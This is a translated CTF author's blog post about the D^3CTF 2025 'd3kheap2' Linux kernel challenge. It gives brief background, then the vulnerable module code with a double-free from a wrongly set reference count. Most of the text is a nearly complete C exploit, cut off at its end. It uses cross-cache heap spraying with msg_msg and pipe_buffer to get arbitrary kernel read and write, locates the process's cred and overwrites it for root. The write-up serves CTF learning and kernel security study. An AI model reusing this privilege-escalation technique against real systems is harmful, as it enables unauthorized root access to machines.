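This article was last updated on the morning of July 3, 2025

The Martian: Penguin Boy, the Beautiful a3 Warrior, and the Unintended Solution

0x00. Before It All Begins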

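As everyone knows, I received my bachelor's degree from Xidian University almost two years ago and am not currently studying there. In principle, then, the burden of writing challenges for D^3CTF, the international competition held by El3ctronic (the joint team formed by the three undergraduate CTF teams L-team, Vidar-Team, and CNSS), should not fall first on a long-graduated old-timer like me. That is why, although I wrote challenges together with Big Penguin in both 2022 and 2023, neither of us, as graduated old-timers, wrote anything in 2024. The Pwn challenges written in 2024 by our juniors ( ~~are there really any female juniors learning Pwn?~~ ) did not seem to run into major trouble, so at first I paid little attention to how this year's D^3CTF was going; after all, it is about time for the younger generation to stand on their own. Then, roughly ten days before the competition started, it suddenly occurred to me: "There's still a competition this year, let me ask the juniors how the preparation is going." Only then did I learn that the juniors of all three teams ( ~~are there really any female juniors learning Pwn?~~ ) had not managed to produce a single Pwn challenge this year…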

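I figured that if there really were no Pwn challenges this year, the whole damn competition would simply blow up, so I hurriedly created a bunch of new folders. Back in the years when I still wrote challenges, each team contributed about two on average, and this year the old penguin was also willing to spare time for one, so I planned for five challenges. Unfortunately, time was simply too tight and I had no particularly stunning ideas prepared ( ~~who could have predicted that old-timers like 👴 and 🐧 would have to come to the rescue this year~~ ), so in the end I finished only two. Luckily this year's competition lasted only 24h; together with the one from 🐧 there were 3 challenges in total, barely enough to hold up a 24h competition. Thankfully the competition went ahead normally in the end, without any serious consequences caused by a shortage of challenges (big lie)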

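As for the other unexpected situations that came up while the competition was running, those are outside what 👴 can govern. After all, the little ones who are the current members eventually have to stand on their own and uphold the team's reputation. At least until things get out of hand, I believe it is inappropriate for me, a graduated old-timer, to take part in decision-making directly ( ~~besides, if 👴 kept meddling in politics every day this long after graduating, wouldn't 👴 be Empress Dowager Cixi~~ ). Then again, thinking it over carefully, many things were never guaranteed a graceful ending anyway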

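Setting the rest aside for now: judging by the final solve counts, the challenges were not beaten too badly, but in terms of quality I am personally not very satisfied with this year's challenges compared with the one from 2023 ( ~~although you may find it hard to see CTF challenges of this level in recent competitions~~ ). Considering how limited the time for writing them was, I think this may have been unavoidable. In any case, I still hope you enjoy these two challenges, into which I poured several days and nights of effort :)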

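You thought the rambling ended here? too young too simple! Each challenge below comes with its own extra serving of rambling (deranged)

Also, since I wrote the English blog post first, this article is mainly translated from it, so the word order may carry some of the translationese everyone loves (?). I hope you don't mind :)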

0x01. D3KHEAP2 | 6 Solves

“Once I was seven years old my arttnba3 told me”

“go make yourself some d3kheap or you’ll be lonely”

“Soon I’ll be 60 years old will I think the kernel pwn is cold”

“Or will I have a lot of baby heap who can sign me in”

Copyright(c) 2025 <ディーキューブ・シーティーエフカーネル Pwn 製作委員会>

Author: arttnba3 @ L-team x El3ctronic x D^3CTF

You can get the attachment at https://github.com/arttnba3/D3CTF2025_d3kheap2.

Introduction

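Like d3kheap in 2022, this challenge does not require much reverse engineering. It provides a kernel module d3kheap2.ko with only one useful core function, d3kheap2_ioctl(), whose core functionality is just allocating objects from a dedicated kmem_cache, d3kheap2_cache. The vulnerability is an incorrectly initialized reference count on the kernel object, which allows an object to be freed twice: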

static long d3kheap2_ioctl(struct file*filp, unsigned int cmd, unsigned long arg)
{
    struct d3kheap2_ureq ureq;
    long res = 0;

    spin_lock(&d3kheap2_globl_lock);

    if (copy_from_user(&ureq, (void*) arg, sizeof(ureq))) {
        logger_error("Unable to copy request from userland!\n");
        res = -EFAULT;
        goto out;
    }

    if (ureq.idx >= D3KHEAP2_BUF_NR) {
        logger_error("Got invalid request from userland!\n");
        res = -EINVAL;
        goto out;
    }

    switch (cmd) {
    case D3KHEAP2_OBJ_ALLOC:
        if (d3kheap2_bufs[ureq.idx].buffer) {
            logger_error(
                "Expected slot [%d] has already been occupied!\n",
                ureq.idx
            );
            res = -EPERM;
            break;
        }

        d3kheap2_bufs[ureq.idx].buffer = kmem_cache_alloc(
            d3kheap2_cachep,
            GFP_KERNEL | __GFP_ZERO
        );
        if (!d3kheap2_bufs[ureq.idx].buffer) {
            logger_error("Failed to alloc new buffer on expected slot!\n");
            res = -ENOMEM;
            break;
        }

        /* vulnerability here */
        atomic_set(&d3kheap2_bufs[ureq.idx].ref_count, 1);
        atomic_inc(&d3kheap2_bufs[ureq.idx].ref_count);

        logger_info(
            "Successfully allocate new buffer for slot [%d].\n",
            ureq.idx
        );

        break;
    case D3KHEAP2_OBJ_FREE:
        if (!d3kheap2_bufs[ureq.idx].buffer) {
            logger_error(
                "Expected slot [%d] had not been allocated!\n",
                ureq.idx
            );
            res = -EPERM;
            break;
        }

        if (atomic_read(&d3kheap2_bufs[ureq.idx].ref_count) <= 0) {
            logger_error("You're not allowed to free a free slot!");
            res = -EPERM;
            break;
        }

        atomic_dec(&d3kheap2_bufs[ureq.idx].ref_count);
        kmem_cache_free(d3kheap2_cachep, d3kheap2_bufs[ureq.idx].buffer);

        logger_info(
            "Successfully free existed buffer on slot [%d].\n",
            ureq.idx
        );

        break;
    case D3KHEAP2_OBJ_EDIT:
        logger_error(
            "🕊🕊🕊 This function hadn't been completed yet bcuz I'm a pigeon!\n"
        );
        break;
    case D3KHEAP2_OBJ_SHOW:
        logger_error(
            "🕊🕊🕊 This function hadn't been completed yet bcuz I'm a pigeon!\n"
        );
        break;
    default:
        logger_error("Got invalid request from userland!\n");
        res = -EINVAL;
        break;
    }

out:
    spin_unlock(&d3kheap2_globl_lock);

    return res;
}

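Old friends may have noticed that this year's challenge looks highly similar to d3kheap in its design. That is because this year's focus is on more advanced exploitation techniques: the earlier challenge was about a general method for exploiting a double free in the general-purpose kmem_cache, whereas this year's is about a general, high-success-rate method for exploiting a double free in an arbitrary kmem_cache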

Exploitation

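Because the vulnerable object lives in a dedicated kmem_cache, a cross-cache attack comes to mind immediately:

First, spray a large number of challenge objects and then free them all, which fills up the challenge's kmem_cache so that some SLUB pages are released back to the buddy system
Perform a large number of allocations in another kmem_cache to take these pages back; here we choose System V IPC as the victim object for the first stage
Free the dangling pointer to construct a UAF on a msg_msgseg, then reallocate the object so that two msg_msgseg pointers refer to the same kernel object
Free one of them and reallocate it as a pipe_buffer, since it uses the same GFP flags as msg_msgseg and both are allocated from kmalloc-cg (when CONFIG_SLAB_BUCKETS is not enabled)
Modify the pipe_buffer through the msg_msgseg to obtain arbitrary memory read and write capability in kernel space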

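Below is our final exploit. Across more than 1024 local runs its success rate was about 99.32%, which in my view should be stable enough

Note that when attacking the remote, you can shrink the binary by compiling with musl-gcc, or by writing the assembly by hand ~~if you have that much free time~~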

/**
 * Copyright (c) 2025 arttnba3 <arttnba@gmail.com>
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
**/

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <stdint.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/prctl.h>

/**
 * Kernel Pwn Infrastructures
**/

#define SUCCESS_MSG(msg)    "\033[32m\033[1m" msg "\033[0m"
#define INFO_MSG(msg)       "\033[34m\033[1m" msg "\033[0m"
#define ERROR_MSG(msg)      "\033[31m\033[1m" msg "\033[0m"

#define log_success(msg)    puts(SUCCESS_MSG(msg))
#define log_info(msg)       puts(INFO_MSG(msg))
#define log_error(msg)      puts(ERROR_MSG(msg))

#define KASLR_GRANULARITY 0x10000000
#define KASLR_MASK (~(KASLR_GRANULARITY - 1))
size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;

void err_exit(char *msg)
{
    printf(ERROR_MSG("[x] Error at: ") "%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf(SUCCESS_MSG("[*] Process bound to core ") "%d\n", core);
}

void get_root_shell(void)
{
    if(getuid()) {
        log_error("[x] Failed to get the root!");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    log_success("[+] Successful to get the root.");
    log_info("[*] Execve root shell now...");

    system("/bin/sh");

    /* to exit the process normally, instead of potential segmentation fault */
    exit(EXIT_SUCCESS);
}

struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/* reads start at `offset` and consume `len` bytes; writes append at `offset + len` */
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct cred {
    long usage;
    uint32_t uid;
    uint32_t gid;
    uint32_t suid;
    uint32_t sgid;
    uint32_t euid;
    uint32_t egid;
    uint32_t fsuid;
    uint32_t fsgid;
};

int get_msg_queue(void)
{
    return msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
}

int read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 0);
}

/**
 * the msgp should be a pointer to the `struct msgbuf`,
 * and the data should be stored in msgbuf.mtext
 */
int write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ((struct msgbuf*)msgp)->mtype = msgtyp;
    return msgsnd(msqid, msgp, msgsz, 0);
}

#ifndef MSG_COPY
    #define MSG_COPY 040000
#endif

/* for MSG_COPY, `msgtyp` means to read no.msgtyp msg_msg on the queue */
int peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    return msgrcv(msqid, msgp, msgsz, msgtyp, 
                  MSG_COPY | IPC_NOWAIT | MSG_NOERROR);
}

/**
 * Challenge Interface
**/

#define D3KHEAP2_OBJ_ALLOC  0x3361626e
#define D3KHEAP2_OBJ_FREE   0x74747261
#define D3KHEAP2_OBJ_EDIT   0x54433344
#define D3KHEAP2_OBJ_SHOW   0x4e575046

struct d3kheap2_ureq {
    size_t idx;
};

int d3kheap2_alloc(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_ALLOC, &ureq);
}

int d3kheap2_free(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_FREE, &ureq);
}

int d3kheap2_edit(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_EDIT, &ureq);
}

int d3kheap2_show(int fd, size_t idx)
{
    struct d3kheap2_ureq ureq = {
        .idx = idx,
    };

    return ioctl(fd, D3KHEAP2_OBJ_SHOW, &ureq);
}

/**
 * Exploitation procedure
**/

#define D3KHEAP2_BUF_NR 0x100
#define D3KHEAP2_OBJ_SZ 2048
#define KMALLOC_2K_OBJ_PER_SLUB 16

#define MSG_QUEUE_NR 0x400
/* it cannot be big because the system limits that */
#define MSG_SPRAY_NR 2
#define MSG_SCAVENGER_SZ (D3KHEAP2_OBJ_SZ - 0x30)
#define MSG_SPRAY_SZ (0x1000 - 0x30 + D3KHEAP2_OBJ_SZ - 8)
/* prepare_copy() will do allocation, so we use bigger size for msg_msgseg */
#define MSG_PEEK_SZ (0x1000 - 0x30 + 0x1000 - 8)
#define MSG_TAG_BASE 0x3361626e74747261

#define PIPE_FCNTL_SZ (0x1000 * 32)
#define PIPE_SPRAY_NR 0x180

struct pipe_buffer *fake_pipe_buf;
struct pipe_buf_operations *pipe_ops;
unsigned int pipe_flags;
unsigned long pipe_private;
int pipe_fd[PIPE_SPRAY_NR][2], atk_pipe[2];
int victim_pipe, ovlp_pipe;

void arbitrary_read_by_pipe(
    size_t page_addr,
    void *buf,
    size_t len,
    int atk_msgq,
    size_t *msg_buf,
    size_t msgsz,
    long msgtyp
)
{
    if (read_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0){
        err_exit("FAILED to read msg_msg and msg_msgseg!");
    }

    fake_pipe_buf = (struct pipe_buffer*) &msg_buf[511];
    fake_pipe_buf->page = (struct page*) page_addr;
    fake_pipe_buf->len = 0xff8;
    fake_pipe_buf->offset = 0;
    fake_pipe_buf->flags = pipe_flags;
    fake_pipe_buf->ops = pipe_ops;
    fake_pipe_buf->private = pipe_private;

    /*
    for (int i = 0; i < 0x80; i++) {
        char ch[8];
        for (int j = 0; j < 8; j++) {
            ch[j] = 'A' + i;
        }

        msg_buf[500 + i] = *(size_t*) ch;
    }
    */

    if (write_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0) {
        err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
    }

    if (read(atk_pipe[0], buf, 0xff0) < 0) {
        perror("[x] Unable to read from pipe");
        err_exit("FAILED to read from evil pipe!");
    }
}

void arbitrary_write_by_pipe(
    size_t page_addr,
    void *buf,
    size_t len,
    int atk_msgq,
    size_t *msg_buf,
    size_t msgsz,
    long msgtyp
)
{
    fake_pipe_buf = (struct pipe_buffer*) &msg_buf[516];

    if (read_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0){
        err_exit("FAILED to read msg_msg and msg_msgseg!");
    }

    fake_pipe_buf->page = (struct page*) page_addr;
    fake_pipe_buf->len = 0;
    fake_pipe_buf->offset = 0;
    fake_pipe_buf->ops = pipe_ops;

    if (write_msg(atk_msgq, msg_buf, msgsz, msgtyp) < 0) {
        err_exit("FAILED to allocate msg_msg to overwrite pipe_buffer!");
    }

    len = len > 0xffe ? 0xffe : len;

    if(write(atk_pipe[1], buf, len) < 0) {
        perror("[x] Unable to write into pipe");
        err_exit("FAILED to write into evil pipe!");
    }
}

#define D3KHEAP2_BUF_SPRAY_NR D3KHEAP2_BUF_NR

void exploit(void)
{
    struct pipe_buffer *leak_pipe_buf;
    int reclaim_msgq[MSG_QUEUE_NR], atk_msgq;
    int vuln_msgq[MSG_QUEUE_NR], evil_msgq[MSG_QUEUE_NR];
    int vulq_idx, vulm_idx, evilq_idx, evilm_idx, found;
    size_t pipe_spray_nr, msg_spray_nr;
    int d3kheap2_fd;
    char err_msg[0x1000];
    size_t buf[0x1000], msg_buf[0x1000];
    size_t kernel_leak, current_pcb_page, *comm_addr;
    uint32_t uid, gid;
    uint64_t cred_kaddr, cred_kpage_addr;
    struct cred *cred_data;
    char cred_data_buf[0x1000];
    int errno;
    struct rlimit rl;

    log_info("[*] Preparing env...");

    rl.rlim_cur = 4096;
    rl.rlim_max = 4096;
    if (setrlimit(RLIMIT_NOFILE, &rl) == -1) {
        perror("[x] setrlimit");
        err_exit("FAILED to expand file descriptor's limit!");
    }

    bind_core(0);

    memset(buf, 0, sizeof(buf));

    d3kheap2_fd = open("/proc/d3kheap2", O_RDWR);
    if (d3kheap2_fd < 0) {
        perror(ERROR_MSG("[x] Unable to open chal fd"));
        err_exit("FAILED to open /proc/d3kheap2!");
    }

    log_info("[*] Preparing msg_queue...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((reclaim_msgq[i] = get_msg_queue()) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to allocate no.%d reclaim msg_queue",
                i
            );
            perror(err_msg);
            err_exit("FAILED to allocate msg_queue for clearing partial SLUB!");
        }
    }

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((vuln_msgq[i] = get_msg_queue()) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to allocate no.%d vuln msg_queue",
                i
            );
            perror(err_msg);
            err_exit("FAILED to allocate msg_queue to be UAF!");
        }
    }

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        if ((evil_msgq[i] = get_msg_queue()) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to allocate no.%d evil msg_queue",
                i
            );
            perror(err_msg);
            err_exit("FAILED to allocate msg_queue to be evil!");
        }
    }

    /* parenthesize the assignment: `<` binds tighter than `=` */
    if ((atk_msgq = get_msg_queue()) < 0) {
        perror("[x] Unable to allocate attacker msg_queue");
        err_exit("FAILED to allocate msg_queue for attacking!");
    }

    log_info("[*] Preparing msg_msg...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < MSG_SPRAY_NR; j++) {
            if (write_msg(
                reclaim_msgq[i],
                buf,
                0x1000 - 0x30,
                MSG_TAG_BASE + j
            ) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to prealloc %d-%d 4k msg_msg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    log_info("[*] Preparing pipe_buffer...");

    for (int i = 0; i < PIPE_SPRAY_NR; i++) {
        if (pipe(pipe_fd[i]) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to create %d pipe\n",
                i
            );
            perror(err_msg);
            err_exit("FAILED to prepare pipe_buffer!");
        }
    }

    log_info("[*] Spraying d3kheap2 buffer...");

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((errno = d3kheap2_alloc(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to allocate no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to allocate d3kheap2 buffer!");
        }
    }

    log_info(
        "[*] Freeing d3kheap2 buffer into buddy "
        "and reclaiming as kmalloc-cg-2k SLUB page..."
    );

    pipe_spray_nr = msg_spray_nr = 0;

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((i / KMALLOC_2K_OBJ_PER_SLUB) % 2 == 0) {
            continue;
        }

        if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to free no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to free d3kheap2 buffer!");
        }
    }

    log_info("[*] Spraying msg_msg to reclaim...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < (MSG_SPRAY_NR / 2); j++) {
            if (read_msg(reclaim_msgq[i],buf,0x1000-0x30,MSG_TAG_BASE+j) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to reclaim %d-%d 4k msg_msg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to reclaim msg_msg!");
            }

            buf[520] = i;
            buf[521] = j;

            if (write_msg(vuln_msgq[i],buf,MSG_SPRAY_SZ,MSG_TAG_BASE+j) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((i / KMALLOC_2K_OBJ_PER_SLUB) % 2 != 0) {
            continue;
        }

        if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to free no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to free d3kheap2 buffer!");
        }
    }

    log_info("[*] Spraying msg_msg to reclaim...");

    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = MSG_SPRAY_NR / 2; j < MSG_SPRAY_NR; j++) {
            if (read_msg(reclaim_msgq[i],buf,0x1000-0x30,MSG_TAG_BASE+j) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to reclaim %d-%d 4k msg_msg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to reclaim msg_msg!");
            }

            buf[520] = i;
            buf[521] = j;

            if (write_msg(vuln_msgq[i], buf, MSG_SPRAY_SZ, MSG_TAG_BASE+j) < 0){
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
                    i,
                    j
                );
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    /* To be honest, we only need to free ONE obj here, just think :) */
    log_info("[*] Creating UAF on msg_msg...");

    for (int i = 0; i < D3KHEAP2_BUF_SPRAY_NR; i++) {
        if ((errno = d3kheap2_free(d3kheap2_fd, i)) < 0) {
            printf(
                ERROR_MSG("FAILED to free no.")"%d"
                ERROR_MSG("d3kheap2 buffer! Retval: ")"%d\n",
                i,
                errno
            );
            err_exit("FAILED to free d3kheap2 buffer!");
        }
    }

    found = 0;
    for (int i = 0; i < MSG_QUEUE_NR; i++) {
        for (int j = 0; j < MSG_SPRAY_NR; j++) {
            buf[520] = *(size_t*) "arttnba3";
            buf[520] += i;
            buf[521] = *(size_t*) "D3CTFPWN";
            buf[521] += j;

            if (write_msg(evil_msgq[i], buf, MSG_SPRAY_SZ, MSG_TAG_BASE + j)<0){
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to alloc %d-%d msg_msg with msg_msgseg\n",
                    i,
                    j);
                perror(err_msg);
                err_exit("FAILED to spray msg_msg!");
            }
        }
    }

    /* make sure the UAF object is on CPU SLAB, so no more spray then */
    for (int k = 0; k < MSG_QUEUE_NR; k++) {
        for (int l = 0; l < MSG_SPRAY_NR; l++) {
            if (peek_msg(vuln_msgq[k], buf, MSG_PEEK_SZ, l) < 0) {
                snprintf(
                    err_msg,
                    sizeof(err_msg) - 1,
                    "[x] Unable to peek %d-%d msg_msg\n",
                    k,
                    l
                );
                perror(err_msg);
                err_exit("FAILED to peek msg_msg!");
            }

            if (buf[520] == *(size_t*) "arttnba3"
                || buf[521] == *(size_t*) "D3CTFPWN") {
                evilq_idx = buf[520] - *(size_t*) "arttnba3";
                evilm_idx = buf[521] - *(size_t*) "D3CTFPWN";
                vulq_idx = k;
                vulm_idx = l;
                printf(
                    SUCCESS_MSG("[+] Found victim on no.")"%d "
                    SUCCESS_MSG("msg in no.")"%d"SUCCESS_MSG("vulqueue")
                    SUCCESS_MSG(".Same msg is on no.")"%d "
                    SUCCESS_MSG("msg in no.")"%d \n",
                    vulm_idx,
                    vulq_idx,
                    evilm_idx,
                    evilq_idx
                );
                found = 1;
                goto out_uaf_msg;
            }
        }
    }

    if (!found) {
        err_exit("FAILED to create cross-cache UAF by spraying msg_msg!");
    }

out_uaf_msg:
    log_info("[*] Shifting obj-overlapping from msg_msg to pipe_buffer...");

    if (read_msg(vuln_msgq[vulq_idx],buf,MSG_SPRAY_SZ,MSG_TAG_BASE+vulm_idx)<0){
        perror("[x] Unable to free the victim msg_msg");
        err_exit("FAILED to free victim msg_msg!");
    }

    for (int i = 0; i < (PIPE_SPRAY_NR / 2); i++) {
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 32) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to fcntl(F_SETPIPE_SZ) on no.%d pipe",
                i
            );
            perror(err_msg);
            err_exit("FAILED to reclaim msg_msg with pipe_buffer!");
        }
    }

    if (read_msg(
        evil_msgq[evilq_idx],
        buf,
        MSG_SPRAY_SZ,
        MSG_TAG_BASE + evilm_idx
    ) < 0) {
        perror("[x] Unable to free the victim msg_msg");
        err_exit("FAILED to free victim msg_msg!");
    }

    /* identification */
    for (int i = 0; i < (PIPE_SPRAY_NR / 2); i++) {
        /* The greate j8 helps us a lot :) */
        for (int j = 0; j < 8; j++) {
            write(pipe_fd[i][1], &i, sizeof(i));
        }
    }

    found = 0;
    for (int i = (PIPE_SPRAY_NR / 2); i < PIPE_SPRAY_NR; i++) {
        if (fcntl(pipe_fd[i][1], F_SETPIPE_SZ, 0x1000 * 32) < 0) {
            snprintf(
                err_msg,
                sizeof(err_msg) - 1,
                "[x] Unable to fcntl(F_SETPIPE_SZ) on no.%d pipe",
                i
            );
            perror(err_msg);
            err_exit("FAILED to reclaim msg_msg with pipe_buffer!");
        }

        for (int j = 0; j < 114; j++) {
            write(pipe_fd[i][1], &i, sizeof(i));
        }

        /**
         * we keep checking to make sure that the object is allocated
         * from the first object of CPU SLUB, hence no spray later
         */
        for (int j = 0; j < (PIPE_SPRAY_NR / 2); j++) {
            int ident;
            read(pipe_fd[j][0], &ident, sizeof(ident));
            if (ident != j) {
                printf(
                    SUCCESS_MSG("[+] Found victim pipe: ")"%d"
                    SUCCESS_MSG(" , overlapped with ")"%d\n",
                    j,
                    ident
                );
                victim_pipe = j;
                ovlp_pipe = ident;
                goto out_overlap_pipe;
            }
            write(pipe_fd[j][1], &ident, sizeof(ident));
        }
    }

    if (!found) {
        err_exit("FAILED to shift OVERLAP from msg_msg to pipe_buffer!");
    }

out_overlap_pipe:
    close(pipe_fd[victim_pipe][1]);
    close(pipe_fd[victim_pipe][0]);

    if (pipe(atk_pipe) < 0 || fcntl(atk_pipe[1], F_SETPIPE_SZ, 0x1000*32) < 0) {
        err_exit("FAILED to allocate new pipe for attacking!");
    }

    /* move to pipe_buffer[1] */
    write(atk_pipe[1], "arttnba3", 8);
    read(atk_pipe[0], buf, 8);
    write(atk_pipe[1], "arttnba3", 8);

    close(pipe_fd[ovlp_pipe][1]);
    close(pipe_fd[ovlp_pipe][0]);

    memset(buf, 0, sizeof(buf));
    if (write_msg(atk_msgq, buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
        perror("[x] Unable to allocate new msg_msg");
        err_exit("FAILED to reclaim the victim pipe_buffer as msg_msg!");
    }

    write(atk_pipe[1], "arttnba3", 8);

    if (read_msg(atk_msgq, msg_buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
        perror("[x] Unable to peek the victim object");
        err_exit("FAILED to peek the victim object!");
    }

    leak_pipe_buf = (void*) &msg_buf[516];

    printf(
        SUCCESS_MSG("[+] Leak pipe_buffer::page ") "%p"
        SUCCESS_MSG(", pipe_buffer::ops ") "%p\n",
        leak_pipe_buf->page,
        leak_pipe_buf->ops
    );

    pipe_flags = leak_pipe_buf->flags;
    pipe_ops = (void*) leak_pipe_buf->ops;
    pipe_private = leak_pipe_buf->private;

    vmemmap_base = (size_t) leak_pipe_buf->page & KASLR_MASK;
    log_info("[*] Try to guess vmemmap_base...");
    printf("[*] Starts from %lx...\n", vmemmap_base);

    if (write_msg(atk_msgq, msg_buf, MSG_SPRAY_SZ, MSG_TAG_BASE) < 0) {
        perror("[x] Unable to allocate new msg_msg");
        err_exit("FAILED to reclaim the victim pipe_buffer as msg_msg!");
    }

    arbitrary_read_by_pipe(
        vmemmap_base + 0x9d000 / 0x1000 * 0x40,
        buf,
        0xff0,
        atk_msgq,
        msg_buf,
        MSG_SPRAY_SZ,
        MSG_TAG_BASE
    );

    kernel_leak = buf[0];
    for (int loop_nr = 0; 1; loop_nr++) {
        if (kernel_leak > 0xffffffff81000000
            && (kernel_leak & 0xff) < 0x100) {
            kernel_base = kernel_leak & 0xfffffffffffff000;
            if (loop_nr != 0) {
                puts("");
            }
            printf(
                INFO_MSG("[*] Leak secondary_startup_64 : ") "%lx\n",kernel_leak
            );
            printf(SUCCESS_MSG("[+] Got kernel base: ") "%lx\n", kernel_base);
            printf(SUCCESS_MSG("[+] Got vmemmap_base: ") "%lx\n", vmemmap_base);
            break;
        } else {
            printf("[?] Got leak: %lx\n", kernel_leak);
            sleep(2);
        }

        for (int i = 0; i < 80; i++) {
            putchar('\b');
        }
        printf(
            "[No.%d loop] Got unmatched data: %lx, keep looping...",
            loop_nr,
            kernel_leak
        );

        vmemmap_base -= KASLR_GRANULARITY;
        arbitrary_read_by_pipe(
            vmemmap_base + 0x9d000 / 0x1000 * 0x40,
            buf,
            0xff0,
            atk_msgq,
            msg_buf,
            MSG_SPRAY_SZ,
            MSG_TAG_BASE
        );
    }

    log_info("[*] Seeking task_struct in kernel space...");

    prctl(PR_SET_NAME, "arttnba3pwnn");
    uid = getuid();
    gid = getgid();

    for (int i = 0; 1; i++) {
        arbitrary_read_by_pipe(
            vmemmap_base + i * 0x40,
            buf,
            0xff0,
            atk_msgq,
            msg_buf,
            MSG_SPRAY_SZ,
            MSG_TAG_BASE
        );
    
        comm_addr = memmem(buf, 0xff0, "arttnba3pwnn", 12);
        if (comm_addr && (comm_addr[-2] > 0xffff888000000000) /* task->cred */
            && (comm_addr[-3] > 0xffff888000000000) /* task->real_cred */
            && (comm_addr[-2] == comm_addr[-3])) {  /* should be equal */

            printf(
                SUCCESS_MSG("[+] Found task_struct on page: ") "%lx\n",
                (vmemmap_base + i * 0x40)
            );
            printf(SUCCESS_MSG("[+] Got cred address: ") "%lx\n",comm_addr[-2]);

            cred_kaddr = comm_addr[-2];
            cred_data = (void*) (cred_data_buf + (cred_kaddr & (0x1000 - 1)));
            page_offset_base = cred_kaddr & KASLR_MASK;

            while (1) {
                cred_kpage_addr = vmemmap_base + \
                                (cred_kaddr - page_offset_base) / 0x1000 * 0x40;
            
                arbitrary_read_by_pipe(
                    cred_kpage_addr,
                    cred_data_buf,
                    0xff0,
                    atk_msgq,
                    msg_buf,
                    MSG_SPRAY_SZ,
                    MSG_TAG_BASE
                );
                if (cred_data->uid == uid
                    && cred_data->gid == gid) {
                    printf(
                        SUCCESS_MSG("[+] Got page_offset_base: ") "%lx\n",
                        page_offset_base
                    );
                    printf(
                        SUCCESS_MSG("[+] Found cred on page: ") "%lx\n",
                        cred_kpage_addr
                    );
                    break;
                }

                page_offset_base -= KASLR_GRANULARITY;
                puts("[?] Looping!?");
            }

            break;
        }
    }

    puts("[*] Overwriting cred and granting root privilege...");

    cred_data->uid = 0;
    cred_data->gid = 0;

    arbitrary_write_by_pipe(
        cred_kpage_addr,
        cred_data_buf,
        0xff0,
        atk_msgq,
